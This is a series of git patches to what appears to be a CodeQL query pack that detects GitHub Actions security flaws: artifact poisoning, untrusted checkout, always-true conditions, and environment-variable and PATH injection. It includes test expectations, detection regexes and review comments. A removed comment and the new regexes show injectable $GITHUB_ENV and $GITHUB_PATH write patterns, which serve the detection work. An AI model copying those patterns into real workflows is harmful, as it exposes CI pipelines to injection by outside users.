@@ -26,6 +27,8 @@ nodes | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected index ca1fef5fa85e..ba635b1d74de 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected 
@@ -6,6 +6,7 @@ edges | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | @@ -26,6 +27,8 @@ nodes | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | 
@@ -45,6 +48,7 @@ subpaths | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | Run Step | | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | Run Step | | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | Run Step | | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | Run Step | | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | Run Step | | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Potential privileged artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 7bee36029d6b..0ba7832e8e8f 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -13,4 +13,5 @@ | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index 27f6bbca39ce..4913ed2d1008 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected 
@@ -18,8 +18,10 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 1a44d83ddbe4c1868884ac0c4b59c6ba79313851 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 17:58:40 +0200 Subject: [PATCH 205/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 64e2861cf688..64f57746a88c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.11 +version: 0.0.12 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c769ea06d0b8..c796ff5ee40e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.11 +version: 0.0.12 groups: - actions - queries From 46d2bb24e52c2031ed0b95bcb90bd6e15177e2e4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 20 Apr 2024 22:57:22 +0200 Subject: [PATCH 206/707] Fix expression always true query --- ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql | 1 + ql/src/qlpack.yml | 2 +- 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 64f57746a88c..4364e979f919 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.12 +version: 0.0.13 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql index 0a951cbabe1a..b631b5f17b31 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql @@ -15,6 +15,7 @@ import actions from If i where + i.getCondition().matches("%${{%") and i.getConditionStyle() = ["|", ">"] or i.getCondition().matches("%${{%") and diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c796ff5ee40e..6259340a4a69 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.12 +version: 0.0.13 groups: - actions - queries 
From 9183fb0d808ca243a32634fbbc3a206342e5487d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 20 Apr 2024 23:31:08 +0200 Subject: [PATCH 207/707] Fix expression always true query --- ql/lib/qlpack.yml | 2 +- .../CWE-571/ExpressionIsAlwaysTrue.ql | 10 +++--- ql/src/qlpack.yml | 2 +- .../CWE-571/.github/workflows/test.yml | 35 +++++++++++++++++-- .../CWE-571/ExpressionIsAlwaysTrue.expected | 7 ++++ 5 files changed, 47 insertions(+), 9 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4364e979f919..b557a60a7512 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.13 +version: 0.0.14 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql index b631b5f17b31..58eab4c60222 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql @@ -1,4 +1,6 @@ /** + *: + * * @name If expression always true * @description Expressions used in If conditions with extra spaces are always true. * @kind problem @@ -16,10 +18,10 @@ import actions from If i where i.getCondition().matches("%${{%") and - i.getConditionStyle() = ["|", ">"] - or - i.getCondition().matches("%${{%") and - not i.getCondition().matches("${{%") + ( + not i.getCondition().matches("${{%") or + not i.getCondition().matches("%}}") + ) or count(i.getCondition().splitAt("${{")) > 2 select i, "Expression always evaluates to true" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6259340a4a69..99ecbe14d557 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.13 +version: 0.0.14 groups: - actions - queries 
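Review bot: The first hunk of ExpressionIsAlwaysTrue.ql inserts a stray ` *:` line at the top of the QLDoc block, which reads as an accidental keystroke and should be dropped so the header starts with ` * @name If expression always true`. In the second hunk the `where` clause now flags any `${{`-containing condition that does not both start with `${{` and end with `}}`, or that contains more than one `${{`, while the `@description` still speaks only of "extra spaces"; a wording such as `@description Conditions that are not a single, complete ${{ }} expression are always truthy.` would match the new logic. The `%}}` test also rejects block scalars that keep a trailing newline (`|+`, `>+`), which the new expected file confirms is intended, so a one-line comment above `not i.getCondition().matches("%}}")` stating that trailing whitespace counts as a mismatch would spare the next reader a detour through the test fixture.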
diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml index 16b725b5ee8d..30c4dcab9320 100644 --- a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml @@ -8,7 +8,7 @@ jobs: process-pr: runs-on: ubuntu-latest steps: - - name: Test1 + - name: Test 1 if: 1 == 2 run: echo "Test 1 should not be printed" - name: Test 2 @@ -36,8 +36,8 @@ jobs: - name: Test 7 run: echo "Test 7 should not be printed" if: ${{ - 1 == 2 || - 3 == 4 + github.actor == 'torvalds' || + github.actor == 'dependabot[bot]' }} - name: Test 8 @@ -58,3 +58,32 @@ jobs: - name: Test 12 if: " ${{ 1 == 2 }}" run: echo "Test 12 should not be printed" + - name: Test 13 + if: | + 1 == 2 || + 3 == 4 + run: echo "Test 13 should not be printed" + - name: Test 14 + if: >- + ${{( + false || 1 == 2 + )}} + run: echo "Test 14 should not be printed" + - name: Test 15 + if: |- + ${{( + false || 1 == 2 + )}} + run: echo "Test 15 should not be printed" + - name: Test 16 + if: |+ + ${{( + false || 1 == 2 + )}} + run: echo "Test 16 should not be printed" + - name: Test 17 + if: >+ + ${{( + false || 1 == 2 + )}} + run: echo "Test 17 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected new file mode 100644 index 000000000000..a8f068c9cd8d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected 
@@ -0,0 +1,7 @@
+| .github/workflows/test.yml:15:13:19:13 | \| | Expression always evaluates to true |
+| .github/workflows/test.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true |
+| .github/workflows/test.yml:45:13:48:24 | > | Expression always evaluates to true |
+| .github/workflows/test.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true |
+| .github/workflows/test.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true |
+| .github/workflows/test.yml:79:13:82:14 | \|+ | Expression always evaluates to true |
+| .github/workflows/test.yml:85:13:88:14 | >+ | Expression always evaluates to true |
From ab7196ac5249f1acf711449d8874235fe4d4897b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Mon, 22 Apr 2024 09:53:30 +0200
Subject: [PATCH 208/707] Fix FPs in EnvVarInjection
---
 .../actions/security/EnvVarInjectionQuery.qll | 18 ------------------
 .../Security/CWE-077/EnvVarInjection.expected | 12 ------------
 .../CWE-077/PrivilegedEnvVarInjection.expected | 16 ----------------
 3 files changed, 46 deletions(-)
diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll
index af155e9f3d7b..7d95188cc8cf 100644
--- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll
+++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll
@@ -24,28 +24,10 @@ predicate envVarInjectionFromFileSink(DataFlow::Node sink) { ) } -/** - * Holds if a Run step declares an environment variable, uses it to declare a new env var. - * e.g. - * env: - * BODY: ${{ github.event.comment.body }} - * run: | - * echo "foo=$(echo $BODY)" >> $GITHUB_ENV - */ -predicate envVarInjectionFromEnvSink(DataFlow::Node sink) { - exists(Run run, Expression expr, string varName, string value | - sink.asExpr().getInScopeEnvVarExpr(varName) = expr and - run = sink.asExpr() and - Utils::writeToGitHubEnv(run, _, value) and - value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 - ) -} - private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { envVarInjectionFromExprSink(this) or envVarInjectionFromFileSink(this) or - envVarInjectionFromEnvSink(this) or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index 31a550e37565..0c4574a77cbb 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected 
@@ -3,10 +3,6 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | 
@@ -16,13 +12,5 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 527808d10b04..6dbe7bf3c936 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected 
@@ -3,10 +3,6 @@ edges | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | 
@@ -16,14 +12,6 @@ nodes | .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:21:9:25:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | -| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | 
@@ -31,7 +19,3 @@ subpaths | .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | -| .github/workflows/test4.yml:21:9:25:6 | Run Step | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:21:9:25:6 | Run Step | Run Step | -| .github/workflows/test4.yml:25:9:31:6 | Run Step | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:25:9:31:6 | Run Step | Run Step | -| .github/workflows/test4.yml:31:9:37:6 | Run Step | .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:31:9:37:6 | Run Step | Run Step | -| .github/workflows/test4.yml:37:9:45:6 | Run Step | .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:37:9:45:6 | Run Step | Run Step | From c31e9dde5e49faa2ab3561a5a13fae573a6bd58e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Apr 2024 16:19:56 +0200 Subject: [PATCH 209/707] Add EnvPathInjection query --- ql/lib/codeql/actions/Ast.qll | 22 ++++++ .../security/EnvPathInjectionQuery.qll | 68 +++++++++++++++++++ .../actions/security/EnvVarInjectionQuery.qll | 2 +- ql/src/Security/CWE-077/EnvPathInjection.ql | 32 +++++++++ .../CWE-077/PrivilegedEnvPathInjection.ql | 28 ++++++++ .../CWE-077/.github/workflows/path1.yml | 33 +++++++++ .../Security/CWE-077/EnvPathInjection.actual | 10 +++ .../Security/CWE-077/EnvPathInjection.qlref | 1 + 8 files changed, 195 insertions(+), 1 deletion(-) create mode 100644 ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll create mode 100644 ql/src/Security/CWE-077/EnvPathInjection.ql create mode 100644 ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/path1.yml create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjection.actual create mode 100644 ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8a3dfb7b2a72..ac222741c025 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -89,6 +89,24 @@ module Utils { ) } + bindingset[line] + predicate extractPathAssignment(string line, string value) { + exists(string path | + // single path assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(.*)>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", + 2) and + value = trimQuotes(path) + or + // workflow command assignment + path = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::add-path::(.*)(\"|')?", 3) + .regexpReplaceAll("^\"", "") + .regexpReplaceAll("\"$", "") and + value = trimQuotes(path) + ) + } + predicate writeToGitHubEnv(Run run, string key, string value) { extractLineAssignment(run.getScript().splitAt("\n"), "ENV", key, value) or extractMultilineAssignment(run.getScript(), "ENV", key, value) @@ -98,6 +116,10 @@ module Utils { extractLineAssignment(run.getScript().splitAt("\n"), "OUTPUT", key, value) or extractMultilineAssignment(run.getScript(), "OUTPUT", key, value) } + + predicate writeToGitHubPath(Run run, string value) { + extractPathAssignment(run.getScript().splitAt("\n"), value) + } } class AstNode instanceof AstNodeImpl { diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll new file mode 100644 index 000000000000..a5cf2d600f01 --- /dev/null +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll 
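Review bot: In `extractPathAssignment` the greedy `(.*)>>` of the first pattern captures everything up to the redirection, including the blank before `>>`, so a line like `echo $PATHINJ >> $GITHUB_PATH` yields the value `$PATHINJ ` with a trailing space; unless `trimQuotes` (not visible here) also trims whitespace, any consumer that compares this value exactly will miss it. A non-greedy group with the whitespace absorbed outside it avoids that: `line.regexpCapture("(echo|Write-Output)\\s+(.*?)\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_PATH(\\})?(\"|')?", 2)`. The pattern also accepts only `$GITHUB_PATH`/`${GITHUB_PATH}`, so the PowerShell form `$env:GITHUB_PATH` that pairs with `Write-Output` is never matched, and if `regexpCapture` is anchored to the whole line like `regexpMatch`, leading indentation inside a multi-line `run:` script defeats it as well. Neither new predicate has a QLDoc; a one-liner such as `/** Holds if the script line appends the given value to the PATH via $GITHUB_PATH or the legacy ::add-path:: workflow command. */` above `extractPathAssignment`, and a matching one above `writeToGitHubPath`, would follow the style of the surrounding module.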
